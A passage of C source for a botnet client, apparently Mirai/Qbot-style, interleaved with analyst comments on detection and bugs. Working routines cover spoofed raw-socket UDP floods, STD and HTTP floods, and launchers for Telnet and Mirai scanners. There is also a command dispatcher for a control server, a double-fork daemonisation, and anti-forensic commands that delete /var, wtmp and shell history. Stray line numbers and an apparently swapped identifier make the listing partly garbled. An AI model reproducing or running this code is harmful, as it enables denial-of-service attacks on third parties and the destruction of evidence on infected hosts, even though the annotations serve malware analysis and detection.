 *    next to the literal in the binary; presumably constant for a given build.
 *  - Because the port is not byte-swapped, on a little-endian host the
 *    observed destination port would be the byte-swapped value of the one in
 *    the command.
 *  - The busy loop has no sleep; the sending process shows sustained CPU use.
 */
void SendSTD(unsigned char *ip, int port, int secs) {
    int iSTD_Sock;
    iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
    time_t start = time(NULL);
    struct sockaddr_in sin;
    struct hostent *hp;
    hp = gethostbyname(ip);
    bzero((char*) &sin,sizeof(sin));
    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
    sin.sin_family = hp->h_addrtype;
    sin.sin_port = port;
    unsigned int a = 0;
    while(1){
        // Work is done on every 50th pass of the loop.
        if (a >= 50) {
            // send() precedes connect(), so the very first send has no destination set.
            send(iSTD_Sock, "std", 69, 0);
            connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
            if (time(NULL) >= start + secs) {
                close(iSTD_Sock);
                _exit(0);
            }
            a = 0;
        }
        a++;
    }
}
/*
 * SendUDP: raw-socket UDP flood routine behind the "UDP" command.
 *
 * target       - host resolved through getHost() (defined elsewhere).
 * port         - destination port; 0 selects a random port per packet.
 * timeEnd      - duration in seconds.
 * packetsize   - payload bytes after the UDP header (processCmd() rejects
 *                values above 1024).
 * pollinterval - number of packets sent between checks of the clock.
 * spoofit      - prefix length used to derive the netmask handed to
 *                getRandomIP(); processCmd() always passes 32.
 *
 * Analyst notes:
 *  - The socket is SOCK_RAW with IP_HDRINCL, so the process needs raw-socket
 *    privilege and writes its own IP header; source address, IP id and UDP
 *    source port are rewritten for every packet.
 *  - getRandomIP() is not visible here; whether spoofit == 32 yields the
 *    host's own address or a forged one has to be confirmed against it.
 *    Source-address validation at the network edge (BCP 38) drops forged
 *    sources either way.
 *  - The UDP checksum field is left at 0 and the payload is filled once by
 *    makeRandomStr(), then reused for every packet.
 */
void SendUDP(unsigned char *target, int port, int timeEnd, int packetsize, int pollinterval, int spoofit) {
        struct sockaddr_in dest_addr;
        dest_addr.sin_family = AF_INET;
        if(port == 0) dest_addr.sin_port = rand_cmwc();
        else dest_addr.sin_port = htons(port);
        if(getHost(target, &dest_addr.sin_addr)) return;
        memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
        register unsigned int pollRegister;
        pollRegister = pollinterval;
                int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
                // Tests for descriptor 0 rather than the -1 that socket() returns on failure.
                if(!sockfd) {
                        return;
                }
                int tmp = 1;
                if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
                        return;
                }
                // Re-seeds both generators 50 times before building the packet.
                int counter = 50;
                while(counter--) {
                        srand(time(NULL) ^ rand_cmwc());
                        init_rand(rand());
                }
                in_addr_t netmask;
                netmask = ( ~((1 << (32 - spoofit)) - 1) );
                // Stack buffer sized from the caller-supplied packetsize.
                unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
                struct iphdr *iph = (struct iphdr *)packet;
                struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
                makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
                udph->len = htons(sizeof(struct udphdr) + packetsize);
                udph->source = rand_cmwc();
                udph->dest = (port == 0 ? rand_cmwc() : htons(port));
                udph->check = 0;
                makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
                iph->check = csum ((unsigned short *) packet, iph->tot_len);
                int end = time(NULL) + timeEnd;
                register unsigned int i = 0;
                while(1) {
                        sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
                        // Header fields are re-randomised after each send.
                        udph->source = rand_cmwc();
                        udph->dest = (port == 0 ? rand_cmwc() : htons(port));
                        iph->id = rand_cmwc();
                        iph->saddr = htonl( getRandomIP(netmask) );
                        iph->check = csum ((unsigned short *) packet, iph->tot_len);
                        // The clock is consulted only once per pollRegister packets.
                        if(i == pollRegister) {
                                if(time(NULL) > end) break;
                                i = 0;
                                continue;
                        }
                        i++;
                }
        }
/*
 * socket_connect: resolve `host` and open a blocking TCP connection to `port`
 * with TCP_NODELAY set.
 *
 * Returns the connected descriptor, or 0 when resolution, socket creation or
 * connect() fails (so descriptor 0 cannot be told apart from failure).
 *
 * Notes from the visible code: `addr` is not zeroed before use, setsockopt()
 * is called before the socket() result is checked, and the socket is not
 * closed when connect() fails.
 */
int socket_connect(char *host, in_port_t port) {
    struct hostent *hp;
    struct sockaddr_in addr;
    int on = 1, sock;
    if ((hp = gethostbyname(host)) == NULL) return 0;
    bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
    if (sock == -1) return 0;
    if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
    return sock;
}
/*
 * SendHTTP: HTTP request flood routine behind the "HTTP" command.
 *
 * method, host, port, path - pieces of the request line and Host header.
 * timeEnd                  - duration in seconds.
 * power                    - number of loop iterations, each of which forks.
 *
 * The process in which fork() returns non-zero (which includes a failed
 * fork) runs the request loop and then exits; the process in which it
 * returns 0 goes on to the next iteration.
 *
 * Analyst notes (what the requests look like on the wire):
 *  - Fixed header order: Host, User-Agent, "Connection: close", nothing else.
 *  - The User-Agent is picked from the first 36 entries of `useragents`
 *    (defined elsewhere) once per iteration and then repeated unchanged.
 *  - Each connection sends one request, reads a single byte and closes, so
 *    server logs show many very short sessions with identical requests.
 *  - The request is built with unbounded sprintf() into a 512-byte buffer
 *    from controller-supplied strings.
 */
void SendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
    int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
    char request[512], buffer[1];
    for (i = 0; i < power; i++) {
        sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, useragents[(rand() % 36)]);
        if (fork()) {
            while (end > time(NULL)) {
                socket = socket_connect(host, port);
                if (socket != 0) {
                    write(socket, request, strlen(request));
                    read(socket, buffer, 1);
                    close(socket);
                }
            }
            exit(0);
        }
    }
}
/*
 * ClearHistory: anti-forensic helper that clears shell history through two
 * system() calls and deletes ~/.bash_history.
 *
 * Analyst note: a missing or freshly truncated .bash_history next to process
 * or audit records of these command lines is a host indicator; shipping
 * shell and audit logs off the host keeps the evidence.
 */
void ClearHistory()
{
    system("history -c;history -w");
    system("cd /;rm -rf ~/.bash_history");
}
/*
 * processCmd: dispatch one controller command. argv[0] is the keyword and the
 * remaining entries are its arguments; how a received line is split into
 * argv is not visible in this part of the file.
 *
 * Keywords handled here: TELNET, MIRAI, PHONE, MIRAITEST, TELNETTEST, BCM
 * (scanner children, ON/OFF), HTTP, UDP, STD (floods, one forked child per
 * target), KILLATTK, LOLNOGTFO and UPDATE.
 *
 * Analyst notes:
 *  - These keywords travel in clear text on the controller connection and
 *    can be matched directly in captured traffic.
 *  - Scanner children are tracked in per-feature pid globals and stopped
 *    with SIGKILL; flood children go through listFork() (defined elsewhere).
 *  - fork() results are stored in a uint32_t, so a failed fork (-1) also
 *    satisfies `parent > 0` and is saved as the child pid. The pid globals'
 *    types are not visible; if they are signed, a later OFF would call
 *    kill(-1, 9) - verify when reconstructing an incident timeline.
 *  - The TELNET and MIRAI branches read argv[1] without checking argc.
 */
void processCmd(int argc, unsigned char *argv[]) {
        // TELNET ON|OFF|FASTLOAD: start or stop TelnetScanner() in a child.
        if(!strcmp(argv[0], "TELNET"))
        {
            if(!strcmp(argv[1], "ON"))
            {
                uint32_t parent;
                parent = fork();
                int ii = 0;
                int forks = sysconf( _SC_NPROCESSORS_ONLN );
                // Second scanner argument is chosen from the CPU count.
                int fds = 999999;
                if(forks == 1) fds = 500;
                if(forks >= 2) fds = 1000;
                if (parent > 0)
                {
                    scanPid = parent;
                    return;
                }
                else if(parent == -1) return;
                // _exit() inside the body means this loop runs at most once.
                for (ii = 0; ii < forks; ii++)
                {
                    srand((time(NULL) ^ getpid()) + getppid());
                    init_rand(time(NULL) ^ getpid());
                    TelnetScanner(100, fds);
                    _exit(0);
                }
            }
            if(!strcmp(argv[1], "OFF"))
            {
                if(scanPid == 0) return;
                kill(scanPid, 9);
                scanPid = 0;
            }
            if(!strcmp(argv[1], "FASTLOAD"))
            {
                // argv[1] is the literal "FASTLOAD" here, so atoi() yields 0 for `threads`.
                int threads = atoi(argv[1]);
                int usec = atoi(argv[2]);
                if(!listFork())
                {
                    //sockprintf(mainCommSock, "[TELNET] Starting Fastload.");
                    TelnetScanner(usec, threads);
                    _exit(0);
                }
                return;
            }
        }
        // MIRAI ON|OFF|FASTLOAD: same layout, driving MiraiScanner().
        if(!strcmp(argv[0], "MIRAI"))
        {
            if(!strcmp(argv[1], "ON"))
            {
                uint32_t parent;
                parent = fork();
                int ii = 0;
                int forks = sysconf( _SC_NPROCESSORS_ONLN );
                int fds = 999999;
                if(forks == 1) fds = 500;
                if(forks >= 2) fds = 1000;
                if (parent > 0)
                {
                    miraiPid = parent;
                    return;
                }
                else if(parent == -1) return;
                // _exit() inside the body means this loop runs at most once.
                for (ii = 0; ii < forks; ii++)
                {
                    srand((time(NULL) ^ getpid()) + getppid());
                    init_rand(time(NULL) ^ getpid());
                    MiraiScanner(100, fds);
                    _exit(0);
                }
            }
            if(!strcmp(argv[1], "OFF"))
            {
                if(miraiPid == 0) return;
                kill(miraiPid, 9);
                miraiPid = 0;
            }
            if(!strcmp(argv[1], "FASTLOAD"))
            {
                // argv[1] is the literal "FASTLOAD" here, so atoi() yields 0 for `threads`.
                int threads = atoi(argv[1]);
                int usec = atoi(argv[2]);
                if(!listFork())
                {
                    //sockprintf(mainCommSock, "Starting scanner!!");
                    MiraiScanner(usec, threads);
                    _exit(0);
                }
                return;
            }
}
// PHONE ON|OFF: exactly two arguments required; child runs PhoneScanner().
if(!strcmp(argv[0], "PHONE")) {
if(argc != 2) {
return; }
if(!strcmp(argv[1], "OFF")) {
if(Phonepid == 0) return;
kill(Phonepid, 9);
Phonepid = 0; }
if(!strcmp(argv[1], "ON")) {
if(Phonepid != 0) return;
uint32_t parent;
parent = fork();
if (parent > 0) { Phonepid = parent; return;}
else if(parent == -1) return;
PhoneScanner();
_exit(0);
}
}
// MIRAITEST ON|OFF: child runs MiraiHackaShit().
if(!strcmp(argv[0], "MIRAITEST")) {
if(argc != 2) {
return; }
if(!strcmp(argv[1], "OFF")) {
if(testmiraiPid == 0) return;
kill(testmiraiPid, 9);
testmiraiPid = 0; }
if(!strcmp(argv[1], "ON")) {
if(testmiraiPid != 0) return;
uint32_t parent;
parent = fork();
if (parent > 0) { testmiraiPid = parent; return;}
else if(parent == -1) return;
MiraiHackaShit();
_exit(0);
}
}
// TELNETTEST ON|OFF: child runs HackaShit().
if(!strcmp(argv[0], "TELNETTEST")) {
if(argc != 2) {
return; }
if(!strcmp(argv[1], "OFF")) {
if(testtelnetPid == 0) return;
kill(testtelnetPid, 9);
testtelnetPid = 0; }
if(!strcmp(argv[1], "ON")) {
if(testtelnetPid != 0) return;
uint32_t parent;
parent = fork();
if (parent > 0) { testtelnetPid = parent; return;}
else if(parent == -1) return;
HackaShit();
_exit(0);
}
}
// BCM ON|OFF: child runs BCMscanner() (defined elsewhere).
if(!strcmp(argv[0], "BCM")) {
if(argc != 2) {
return; }
if(!strcmp(argv[1], "OFF")) {
if(bcmPid == 0) return;
kill(bcmPid, 9);
bcmPid = 0; }
if(!strcmp(argv[1], "ON")) {
if(bcmPid != 0) return;
uint32_t parent;
parent = fork();
if (parent > 0) { bcmPid = parent; return;}
else if(parent == -1) return;
BCMscanner();
_exit(0);
}
}

        if (!strcmp(argv[0], "HTTP"))
        {
            // !* HTTP METHOD TARGET PORT PATH TIME POWER
            // !* HTTP POST/GET/HEAD hackforums.net 80 / 10 100
            // The guard accepts argc == 6, yet argv[6] (POWER) is read below.
            if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
            if (listFork()) return;
            SendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
            exit(0);
        }
        if(!strcmp(argv[0], "UDP"))
        {
            // !* UDP TARGET PORT TIME PACKETSIZE POLLINTERVAL
            // Packet size is capped at 1024 by this guard.
            if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 1024 || (argc == 6 && atoi(argv[5]) < 1))
            {
                return;
            }
                unsigned char *ip = argv[1];
                int port = atoi(argv[2]);
                int time = atoi(argv[3]);
                int packetsize = atoi(argv[4]);
                int pollinterval = (argc == 6 ? atoi(argv[5]) : 10);
                // Prefix length handed to SendUDP() is fixed at 32.
                int spoofed = 32;
                // A comma-separated target list gets one forked child per entry.
                if(strstr(ip, ",") != NULL)
                {
                    unsigned char *hi = strtok(ip, ",");
                    while(hi != NULL)
                    {
                        if(!listFork())
                        {
                            SendUDP(hi, port, time, packetsize, pollinterval, spoofed);
                            _exit(0);
                        }
                        hi = strtok(NULL, ",");
                    }
                } else {
                            if (listFork())
                            {
                                return;
                            }
                            SendUDP(ip, port, time, packetsize, pollinterval, spoofed);
                            _exit(0);
                       }
        }
        if(!strcmp(argv[0], "STD"))
        {
            //!* STD TARGET PORT TIME
            if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
            {
                return;
            }
            unsigned char *ip = argv[1];
            int port = atoi(argv[2]);
            int time = atoi(argv[3]);
            // A comma-separated target list gets one forked child per entry.
            if(strstr(ip, ",") != NULL)
            {
                unsigned char *hi = strtok(ip, ",");
                while(hi != NULL)
                {
                    if(!listFork())
                    {
                        SendSTD(hi, port, time);
                        _exit(0);
                    }
                    hi = strtok(NULL, ",");
                }
            } else {
                        if (listFork())
                        {
                            return;
                        }
                        SendSTD(ip, port, time);
                        _exit(0);
                   }
        }
        // KILLATTK: SIGKILL every tracked child pid except the caller itself.
        if(!strcmp(argv[0], "KILLATTK"))
        {
                int killed = 0;
                unsigned long i;
                for (i = 0; i < numpids; i++)
                {
                        if (pids[i] != 0 && pids[i] != getpid())
                        {
                                kill(pids[i], 9);
                                killed++;
                        }
                }
                if(killed > 0)
                {
                    //
                } else {
                            //
                       }
        }
        // LOLNOGTFO: the receiving process exits.
        if(!strcmp(argv[0], "LOLNOGTFO"))
        {
                exit(0);
        }
        // UPDATE: wipes local temp/log paths via RemoveTempDirs() and reports build info.
        if(!strcmp(argv[0], "UPDATE"))
        {
            RemoveTempDirs();
            sockprintf(mainCommSock, "[Updating] [%s:%s]", getBuild(), getEndianness());
        }
}
/*
 * initConnection: (re)connect the controller socket.
 *
 * Closes any open mainCommSock, steps to the next server-list entry, splits
 * an optional ":port" suffix off the entry (default Server_Botport) and
 * connects with a 30-second timeout via connectTimeout() (defined elsewhere).
 *
 * Returns 1 when the connection attempt fails, 0 on success.
 *
 * Notes from the visible code:
 *  - mainCommSock doubles as the server-list index and as the socket
 *    descriptor; it is reset to 0 after close(), so the index arithmetic
 *    always starts from 0.
 *  - The entry is read from Busybox_Payload[mainCommSock], while
 *    SERVER_LIST_SIZE is computed from commServer and Busybox_Payload is
 *    passed to strlen()/send() as a plain string elsewhere in the file. This
 *    looks like an identifier swapped during editing of the paste; treat the
 *    listing as not building as published (TODO confirm against the
 *    definitions, which are outside this part of the file).
 *  - strcpy() into the 4096-byte buffer is unbounded.
 */
int initConnection() {
unsigned char server[4096];
memset(server, 0, 4096);
if(mainCommSock) { close(mainCommSock); mainCommSock = 0; }
if(mainCommSock + 1 == SERVER_LIST_SIZE) mainCommSock = 0;
else mainCommSock++;
strcpy(server, Busybox_Payload[mainCommSock]);
int port = Server_Botport;
// "host:port" form: parse the port, then cut the string at the colon.
if(strchr(server, ':') != NULL) {
port = atoi(strchr(server, ':') + 1);
*((unsigned char *)(strchr(server, ':'))) = 0x0; }
mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
return 0;
}
  3166. void UpdateNameSrvs() {
  3167.     uint16_t fhandler = open("/etc/resolv.conf", O_WRONLY | O_TRUNC);
  3168.     if (access("/etc/resolv.conf", F_OK) != -1) {
  3169.         const char* resd = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n";
  3170.         size_t resl = strlen(resd);
  3171.         write(fhandler, resd, resl);
  3172.     } else { return; }
  3173.     close(fhandler);
  3174. }
/*
 * RemoveTempDirs: destructive cleanup run on the local host through system().
 *
 * Deletes everything under /tmp, /var, /var/run and /var/tmp, removes
 * /var/log/wtmp (login records) and ~/.bash_history, and clears shell
 * history. In the visible code it is called on the UPDATE command and from
 * the Telnet login loops; main() also calls it after connecting.
 *
 * Analyst notes:
 *  - The "/var/*" glob takes logs and service state with it, so a host with
 *    an emptied /var and a missing wtmp is a strong indicator and will
 *    usually show service failures as a side effect.
 *  - Local logs cannot be relied on afterwards; remote log forwarding and
 *    process-execution auditing (the literal "rm -rf /tmp/* /var/*" command
 *    line) preserve the evidence.
 */
void RemoveTempDirs() {
    system("rm -rf /tmp/* /var/* /var/run/* /var/tmp/*");
    system("rm -rf /var/log/wtmp");
    system("rm -rf ~/.bash_history");
    system("history -c;history -w");
}
/*
 * getEndianness: report the host byte order as a label.
 *
 * Writes the bytes 00 01 02 03 into a union and reads them back as a
 * uint32_t; the resulting value selects one of "BIG_ENDIAN", "LITTLE_ENDIAN",
 * "BIG_ENDIAN_W", "LITTLE_ENDIAN_W" or "UNKNOWN".
 *
 * NOTE(review): the function is declared to return int but every return
 * statement yields a string literal, and the callers in this file pass the
 * result to a "%s" conversion. The labels appear verbatim in the
 * "[ CONNECTED ]" and "[Updating]" lines sent to the controller.
 */
int getEndianness(void)
{
    union
    {
        uint32_t vlu;
        uint8_t data[sizeof(uint32_t)];
    } nmb;
    nmb.data[0] = 0x00;
    nmb.data[1] = 0x01;
    nmb.data[2] = 0x02;
    nmb.data[3] = 0x03;
    switch (nmb.vlu)
    {
        case UINT32_C(0x00010203):
            return "BIG_ENDIAN";
        case UINT32_C(0x03020100):
            return "LITTLE_ENDIAN";
        case UINT32_C(0x02030001):
            return "BIG_ENDIAN_W";
        case UINT32_C(0x01000302):
            return "LITTLE_ENDIAN_W";
        default:
            return "UNKNOWN";
    }
}
/*
 * getOurIP: learn the host's outward-facing IPv4 address and the MAC address
 * of the default-route interface.
 *
 * The address comes from connect()ing a UDP socket to 8.8.8.8:53 and reading
 * the local end with getsockname(); it is stored in the global `ourIP`. The
 * interface name is the text before the first tab on the /proc/net/route
 * line that contains a 00000000 field, and its hardware address is copied
 * into the global `macAddress` via SIOCGIFHWADDR.
 *
 * Returns 0 on the early failure paths; the normal path ends without a
 * return statement although the function is declared int.
 *
 * Notes from the visible code: the open() result is not checked, the socket
 * is not closed on the early returns, and the interface name is copied into
 * ifr.ifr_name with an unbounded strcpy().
 */
int getOurIP() {
int sock = socket(AF_INET, SOCK_DGRAM, 0);
if(sock == -1) return 0;
struct sockaddr_in serv;
memset(&serv, 0, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = inet_addr("8.8.8.8");
serv.sin_port = htons(53);
int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
if(err == -1) return 0;
struct sockaddr_in name;
socklen_t namelen = sizeof(name);
err = getsockname(sock, (struct sockaddr*) &name, &namelen);
if(err == -1) return 0;
ourIP.s_addr = name.sin_addr.s_addr;
int cmdline = open("/proc/net/route", O_RDONLY);
char linebuf[4096];
// Scan the routing table for the default route; non-matching lines are wiped
// so linebuf ends up empty when no such line exists.
while(fdgets(linebuf, 4096, cmdline) != NULL)
{
if(strstr(linebuf, "\t00000000\t") != NULL)
{
// Cut the line at the first tab, leaving only the interface name.
unsigned char *pos = linebuf;
while(*pos != '\t') pos++;
*pos = 0;
break;
}
memset(linebuf, 0, 4096);
}
close(cmdline);
if(*linebuf)
{
int i;
struct ifreq ifr;
strcpy(ifr.ifr_name, linebuf);
ioctl(sock, SIOCGIFHWADDR, &ifr);
for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
}
close(sock);
}
  3245. int main(int argc, unsigned char *argv[]) {
                // Entry point of the bot client: blanks its process name,
                // detaches with a double fork, then connects to the control
                // server and dispatches the lines it receives to processCmd().
                // initConnection(), sockprintf(), recvLine(), trim(),
                // processCmd() and the globals used here (mainCommSock, pids,
                // numpids, ourIP) are defined outside this view.
                // Host artifacts for detection: zeroed argv[0] and an empty
                // thread name, a daemon-style double fork, chdir("/"),
                // setuid(0)/seteuid(0) attempts, and a new PID on every failed
                // connection attempt (see the loop below).
  3246.         const char *lolsuckmekid = "";
                // SERVER_LIST_SIZE is a sizeof quotient (unsigned), so this
                // only triggers when the server list is empty.
  3247.         if(SERVER_LIST_SIZE <= 0) return 0;
                // strncpy pads with NULs up to the given length, so this
                // overwrites the original program name in place: argv[0] then
                // reads as empty in /proc/<pid>/cmdline. Later arguments are
                // not touched.
  3248.         strncpy(argv[0],"",strlen(argv[0]));
  3249.         argv[0] = "";
                // Sets the thread name (comm) to the empty string. Neither
                // this nor the argv overwrite changes /proc/<pid>/exe, which
                // still identifies the binary.
  3250.         prctl(PR_SET_NAME, (unsigned long) lolsuckmekid, 0, 0, 0);
                // Both generators are seeded from time XOR pid, i.e. from
                // guessable values.
  3251.         srand(time(NULL) ^ getpid());
  3252.         init_rand(time(NULL) ^ getpid());
  3253.         pid_t pid1;
  3254.         pid_t pid2;
  3255.         int status;
  3256.         getOurIP();
                // Double fork: the original process waits for the first child
                // and exits, the first child forks again and exits, and only
                // the grandchild continues past this block. A failed fork()
                // returns -1, which is non-zero and takes the "parent" branch.
                // The trailing else branches are empty and cannot be reached.
                // No setsid() call appears in this function.
  3257.         if (pid1 = fork()) {
  3258.                         waitpid(pid1, &status, 0);
  3259.                         exit(0);
  3260.         } else if (!pid1) {
  3261.                         if (pid2 = fork()) {
  3262.                                         exit(0);
  3263.                         } else if (!pid2) {
  3264.                         } else {
  3265.                         }
  3266.         } else {
  3267.         }
                // Return values of the next three calls are ignored; the uid
                // calls change nothing unless the process is already
                // privileged.
  3268.         chdir("/");
  3269.         setuid(0);             
  3270.         seteuid(0);
                // Ignore SIGPIPE so a write to a closed socket returns an
                // error instead of terminating the process.
  3271.         signal(SIGPIPE, SIG_IGN);
                // Loop shape: fork(); the parent side skips the if-body and
                // reaches `return 0` at the bottom, so it exits at once. The
                // child runs the session. When initConnection() reports
                // failure the child sleeps 5 s and `continue`s to the top,
                // where it forks again and itself exits as the new parent --
                // so each retry runs under a fresh PID. When recvLine()
                // returns -1 the child also reaches `return 0`; no reconnect
                // happens in that case.
  3272.         while(1) {
  3273.                 if(fork() == 0) {
  3274.                 if(initConnection()) { sleep(5); continue; }
                        // Check-in line reporting source IP, build architecture
                        // and endianness. The literal prefix is a candidate
                        // string for network signatures if the channel is not
                        // encrypted (sockprintf is not visible here -- confirm).
  3275.                 sockprintf(mainCommSock, "[ CONNECTED ] IP: %s || Arch Type: %s || Endianness Type: %s", inet_ntoa(ourIP), getBuild(), getEndianness());
                        // Opaque helpers; judging by the names they touch
                        // resolver settings and temporary directories -- verify
                        // against their definitions.
  3276.                 UpdateNameSrvs();
  3277.                 RemoveTempDirs();
  3278.                 char commBuf[4096];
  3279.                 int got = 0;
  3280.                 int i = 0;
  3281.                 while((got = recvLine(mainCommSock, commBuf, 4096)) != -1) {
                                // Reap finished children recorded in pids[]: shift
                                // the tail down, then copy into a fresh array.
                                // NOTE(review): malloc() is unchecked, and after a
                                // removal the i++ skips the entry that moved into
                                // slot i until the next received line.
  3282.                         for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
  3283.                                 unsigned int *newpids, on;
  3284.                                 for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
  3285.                                 pids[on - 1] = 0;
  3286.                                 numpids--;
  3287.                                 newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
  3288.                                 for (on = 0; on < numpids; on++) newpids[on] = pids[on];
  3289.                                 free(pids);
  3290.                                 pids = newpids;
  3291.                         }
                                // NOTE(review): if recvLine() can return 4096 this
                                // writes one byte past commBuf -- confirm against
                                // recvLine(). The buffer is not cleared between
                                // lines, so bytes after the terminator are stale.
  3292.                         commBuf[got] = 0x00;
  3293.                         trim(commBuf);
                                // Lines beginning with PING are ignored; a line
                                // beginning with DUP makes this process exit.
  3294.                         if(strstr(commBuf, "PING") == commBuf) { // PING
  3295.                                 continue;
  3296.                         }
  3297.                         if(strstr(commBuf, "DUP") == commBuf) exit(0); // DUP
  3298.                         unsigned char *message = commBuf;
                                // Command lines have the form
                                // "!<mask> <command> [param ...]"; everything
                                // else is dropped.
  3299.                         if(*message == '!') {
                                        // Isolate the token after '!'. It is only
                                        // used to compute where the command starts;
                                        // its value is never compared to anything.
  3300.                                 unsigned char *nickMask = message + 1;
  3301.                                 while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
  3302.                                 if(*nickMask == 0x00) continue;
  3303.                                 *(nickMask) = 0x00;
  3304.                                 nickMask = message + 1;
  3305.                                 message = message + strlen(nickMask) + 2;
                                        // Strip trailing CR/LF. NOTE(review): if
                                        // message is empty here, strlen(message) - 1
                                        // wraps and the index is out of bounds.
  3306.                                 while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
  3307.                                 unsigned char *command = message;
                                        // Terminate the command word and step past
                                        // it. NOTE(review): when the command is the
                                        // last token, message++ moves beyond the
                                        // string's terminator, so strtok() below
                                        // parses whatever stale bytes follow.
  3308.                                 while(*message != ' ' && *message != 0x00) message++;
  3309.                                 *message = 0x00;
  3310.                                 message++;
                                        // Upper-case the command word in place.
  3311.                                 unsigned char *tmpcommand = command;
  3312.                                 while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
                                        // params[0] is the command; params[1..] are
                                        // heap copies of the space-separated tokens.
                                        // NOTE(review): paramsCount is never checked
                                        // against the 10-slot array, so a line from
                                        // the server with more than 9 tokens writes
                                        // past params[]; malloc() is also unchecked.
  3313.                                 unsigned char *params[10];
  3314.                                 int paramsCount = 1;
  3315.                                 unsigned char *pch = strtok(message, " ");
  3316.                                 params[0] = command;
  3317.                                 while(pch) {
  3318.                                         if(*pch != '\n') {
  3319.                                                 params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
  3320.                                                 memset(params[paramsCount], 0, strlen(pch) + 1);
  3321.                                                 strcpy(params[paramsCount], pch);
  3322.                                                 paramsCount++;
  3323.                                         }
  3324.                                         pch = strtok(NULL, " ");
  3325.                                 }
                                        // Hand the parsed command to the dispatcher,
                                        // then release the copies (params[0] points
                                        // into commBuf and is not freed).
  3326.                                 processCmd(paramsCount, params);
  3327.                                 if(paramsCount > 1) {
  3328.                                         int q = 1;
  3329.                                         for(q = 1; q < paramsCount; q++) {
  3330.                                                 free(params[q]);
  3331.                                         }
  3332.                                 }
  3333.                         }
  3334.                 }
  3335.         }
                // Reached by the parent side of every fork() above and by a
                // child whose session ended.
  3336.         return 0;
  3337.     }
  3338. }